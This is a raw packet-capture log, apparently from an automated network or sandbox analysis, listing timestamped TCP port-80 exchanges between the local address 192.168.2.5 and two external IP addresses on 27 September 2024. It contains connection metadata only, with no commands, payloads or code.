                                                                          Sep 27, 2024 04:21:16.209964037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.209975004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.210014105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.210014105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.213251114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213273048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213326931 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.213399887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213412046 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213424921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213435888 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213464022 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.213495970 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.213550091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213561058 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.213601112 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.214170933 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214181900 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214194059 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214205980 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214217901 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214227915 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.214229107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214241028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214262009 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.214293003 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.214329004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.214375019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216422081 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216434956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216445923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216504097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216504097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216599941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216619015 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216629982 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216640949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216654062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216655016 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216666937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216676950 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216681004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216691971 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216722965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216722965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216770887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216777086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216784000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216798067 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216808081 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216818094 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216845989 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216876030 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.216939926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216953039 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216964006 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216976881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216993093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.216999054 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217005014 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217029095 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217029095 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217061043 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217091084 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217109919 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217122078 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217159986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217159986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217252970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217263937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217274904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217286110 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217298031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217302084 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217340946 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217340946 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217401981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217413902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217426062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217437029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217447996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217457056 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217458963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217483997 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217514992 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217549086 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217562914 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217575073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217585087 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217596054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217605114 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217611074 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217632055 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217653990 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217706919 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217719078 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217730045 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217741966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217749119 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217753887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217767954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217781067 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217782021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217794895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217802048 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217807055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217819929 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217832088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217832088 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217844009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217855930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217866898 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217871904 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217871904 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217879057 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217895985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217899084 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.217926025 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.217947006 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223171949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223236084 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223248005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223257065 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223283052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223290920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223301888 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223304987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223321915 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223335981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223356009 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223356009 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223376036 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223378897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223396063 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223428011 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223458052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223469973 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223481894 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223494053 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223505020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223514080 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223535061 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223551035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.223553896 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.223606110 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.244827986 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245341063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245352030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245362997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245414019 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.245419025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245430946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245444059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245455027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.245456934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.245488882 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.245532990 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.246865988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.246884108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.246893883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.246974945 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.246974945 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.247036934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.247055054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.247067928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.247080088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.247098923 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.247098923 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.247137070 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.250186920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250200033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250210047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250256062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250267029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250279903 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250272989 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250291109 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250324011 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250324011 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250328064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250345945 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250348091 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250359058 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250370979 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250377893 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250384092 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250397921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250408888 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250408888 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250421047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.250452042 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.250483036 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.251523018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251533985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251545906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251579046 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251633883 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251677990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251689911 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251702070 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251712084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251743078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251743078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251807928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251872063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251883030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251893997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251904964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251916885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.251929045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251929045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251949072 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251990080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.251996040 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252007961 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252048969 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.252048969 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.252341986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252353907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252365112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252397060 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.252409935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.252410889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252409935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.252423048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252434969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252444983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.252466917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.252466917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.252623081 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253142118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253153086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253164053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253196955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253209114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253221035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253232002 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253246069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253246069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253284931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253437042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253448009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253460884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253473043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253515005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253515005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253814936 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253825903 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253838062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253853083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253861904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253884077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253884077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253906965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253917933 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253927946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253938913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253950119 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253951073 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253951073 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.253968954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253981113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.253984928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254026890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254026890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254126072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254137993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254148006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254167080 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254174948 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254179001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254198074 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254235029 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254270077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254287958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254300117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254312038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254333973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254333973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254368067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254379034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254379988 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254396915 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254410028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254411936 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254422903 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254429102 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254435062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.254472017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.254472017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.263320923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263430119 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.263475895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263484955 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263500929 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263514996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263523102 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.263525963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263537884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263541937 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.263547897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.263585091 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.263633966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.279145956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279234886 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.279292107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279304028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279314041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279337883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279341936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.279350996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279361963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279364109 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.279380083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279401064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279412985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279431105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279434919 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.279434919 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.279444933 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279457092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279479027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279479027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279535055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279572964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279582977 CEST8049725185.215.113.117192.168.2.5
